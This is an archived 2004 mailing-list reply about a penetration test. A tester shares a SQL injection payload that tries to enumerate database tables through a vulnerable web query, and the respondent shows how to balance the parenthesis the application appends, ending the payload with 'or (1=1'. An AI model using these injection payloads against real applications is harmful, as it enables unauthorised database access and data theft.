From: Fabrice MARIE (fabrice.marie@fma-rms.com)
Date: Mon Jul 05 2004 - 01:11:09 EDT
Hello,
On 03 July 2004 pm 22:45, Strcpy wrote:
> Hi list .
> I`m working on a web-application for vulnerability
> assesments in order to complete a pen-test job.
> there is a vulnerable query there but I can`t escape
> it ad use it to go farther .
> the page script add a ')' to end of query string
> always.
> I tried to pass it by useing # or -- or ')'=')' at the
> end of my query strings , but non worked :/
> here is an example :
> i sent this :
> A') select name from sysobjects where xtype='U'--
> [Microsoft][ODBC Microsoft Access Driver] Syntax
> error. in query expression 'city_name='Tehran' and
> (agency_english ='A') select name from sysobjects
> where xtype='U'--')'
> would you mind please help me ?
try something like this:
select name from sysobjects where xtype='U' or (1=1
This way if the application adds a parenthesis, it's just going
to close the one you opened on purpose and the syntax should
remain correct in the end.
'or 1=1' doesn't affect your SELECT query, because it's always true..
Have a nice day,
Fabrice.
-- Fabrice A. MARIE FMA Risk Management Solutions http://www.fma-rms.com/
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:57 EDT